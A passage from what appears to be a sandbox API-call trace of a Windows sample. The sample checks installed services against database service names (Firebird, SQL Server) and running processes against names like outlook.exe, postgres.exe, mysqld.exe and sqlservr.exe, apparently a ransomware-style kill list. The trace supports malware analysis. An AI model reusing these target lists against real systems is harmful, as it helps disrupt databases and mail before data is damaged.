[0037.920] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0037.920] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0037.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0037.920] lstrlenW (lpString="DPS") returned 3 [0037.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0037.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0037.920] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0037.920] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0037.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0037.920] lstrlenW (lpString="eventlog") returned 8 [0037.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0037.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0037.920] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0037.920] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0037.920] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0037.920] lstrlenW (lpString="EventSystem") returned 11 [0037.920] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0037.920] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0037.921] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0037.921] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0037.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0037.921] lstrlenW (lpString="gpsvc") returned 5 [0037.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0037.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0037.921] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0037.921] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0037.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0037.921] lstrlenW (lpString="iphlpsvc") returned 8 [0037.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0037.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0037.921] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0037.921] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0037.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0037.921] lstrlenW (lpString="LanmanServer") returned 12 [0037.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0037.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0037.921] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0037.921] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0037.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0037.921] lstrlenW (lpString="LanmanWorkstation") returned 17 [0037.921] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0037.921] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0037.921] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0037.921] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0037.921] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0037.922] lstrlenW (lpString="lmhosts") returned 7 [0037.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0037.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0037.922] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0037.922] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0037.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0037.922] lstrlenW (lpString="MMCSS") returned 5 [0037.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0037.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0037.922] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0037.922] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0037.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0037.922] lstrlenW (lpString="MpsSvc") returned 6 [0037.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0037.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0037.922] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0037.922] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0037.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0037.922] lstrlenW (lpString="Netman") returned 6 [0037.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0037.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0037.922] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0037.922] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0037.922] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0037.922] lstrlenW (lpString="netprofm") returned 8 [0037.922] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0037.922] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0037.922] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0037.923] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0037.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0037.923] lstrlenW (lpString="NlaSvc") returned 6 [0037.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0037.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0037.923] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0037.923] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0037.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0037.923] lstrlenW (lpString="nsi") returned 3 [0037.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0037.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0037.923] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0037.923] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0037.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0037.923] lstrlenW (lpString="PcaSvc") returned 6 [0037.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0037.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0037.923] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0037.923] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0037.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0037.923] lstrlenW (lpString="PlugPlay") returned 8 [0037.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0037.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0037.923] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0037.923] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0037.923] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0037.923] lstrlenW (lpString="Power") returned 5 [0037.923] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0037.923] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0037.923] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0037.923] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0037.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0037.924] lstrlenW (lpString="ProfSvc") returned 7 [0037.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0037.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0037.924] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0037.924] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0037.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0037.924] lstrlenW (lpString="RpcEptMapper") returned 12 [0037.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0037.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0037.924] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0037.924] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0037.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0037.924] lstrlenW (lpString="RpcSs") returned 5 [0037.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0037.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0037.924] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0037.924] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0037.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0037.924] lstrlenW (lpString="SamSs") returned 5 [0037.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0037.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0037.924] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0037.924] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0037.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0037.924] lstrlenW (lpString="Schedule") returned 8 [0037.924] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0037.924] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0037.924] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0037.924] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0037.924] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0037.924] lstrlenW (lpString="SENS") returned 4 [0037.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0037.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0037.925] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0037.925] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0037.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0037.925] lstrlenW (lpString="ShellHWDetection") returned 16 [0037.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0037.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0037.925] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0037.925] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0037.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0037.925] lstrlenW (lpString="Spooler") returned 7 [0037.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0037.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0037.925] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0037.925] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0037.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0037.925] lstrlenW (lpString="SysMain") returned 7 [0037.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0037.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0037.925] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0037.925] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0037.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0037.925] lstrlenW (lpString="Themes") returned 6 [0037.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0037.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0037.925] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0037.926] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0037.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0037.926] lstrlenW (lpString="TrkWks") returned 6 [0037.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0037.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0037.926] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0037.926] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0037.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0037.926] lstrlenW (lpString="UxSms") returned 5 [0037.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0037.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0037.926] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0037.926] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0037.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0037.926] lstrlenW (lpString="WdiServiceHost") returned 14 [0037.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0037.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0037.926] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0037.926] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0037.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0037.926] lstrlenW (lpString="WdiSystemHost") returned 13 [0037.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0037.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0037.926] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0037.926] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0037.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0037.926] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0037.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0037.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0037.927] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0037.927] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0037.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0037.927] lstrlenW (lpString="Winmgmt") returned 7 [0037.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0037.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0037.927] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0037.927] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0037.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0037.927] lstrlenW (lpString="WPDBusEnum") returned 10 [0037.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0037.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0037.927] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0037.927] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0037.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0037.927] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x64e1d8 | out: hHeap=0x600000) returned 1 [0037.927] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a0 [0037.929] Process32FirstW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0037.930] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0037.931] lstrlenW (lpString="System") returned 6 [0037.931] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0037.931] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0037.931] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0037.931] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0037.931] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0037.931] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0037.931] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0037.931] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0037.932] lstrlenW (lpString="smss.exe") returned 8 [0037.932] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0037.932] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0037.932] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0037.932] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0037.932] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0037.932] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0037.932] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0037.932] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0037.933] lstrlenW (lpString="csrss.exe") returned 9 [0037.933] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0037.933] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0037.933] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0037.933] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0037.933] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0037.933] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0037.933] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0037.933] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0037.934] lstrlenW (lpString="wininit.exe") returned 11 [0037.934] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0037.934] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0037.934] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0037.934] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0037.934] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0037.934] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0037.934] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0037.934] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0037.935] lstrlenW (lpString="csrss.exe") returned 9 [0037.935] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0037.935] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0037.935] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0037.935] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0037.935] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0037.935] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0037.936] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0037.936] lstrlenW (lpString="winlogon.exe") returned 12 [0037.936] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0037.937] lstrlenW (lpString="services.exe") returned 12 [0037.937] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0037.938] lstrlenW (lpString="lsass.exe") returned 9 [0037.938] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0037.939] lstrlenW (lpString="lsm.exe") returned 7 [0037.939] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.940] lstrlenW (lpString="svchost.exe") returned 11 [0037.940] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.940] lstrlenW (lpString="svchost.exe") returned 11 [0037.940] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.941] lstrlenW (lpString="svchost.exe") returned 11 [0037.941] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.942] lstrlenW (lpString="svchost.exe") returned 11 [0037.942] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.943] lstrlenW (lpString="svchost.exe") returned 11 [0037.943] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0037.944] lstrlenW (lpString="audiodg.exe") returned 11 [0037.944] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.944] lstrlenW (lpString="svchost.exe") returned 11 [0037.944] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0037.945] lstrlenW (lpString="svchost.exe") returned 11 [0037.945] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0037.946] lstrlenW (lpString="dwm.exe") returned 7 [0037.946] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0037.947] lstrlenW (lpString="explorer.exe") returned 12 [0037.947] Process32NextW (in: hSnapshot=0x1a0, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, 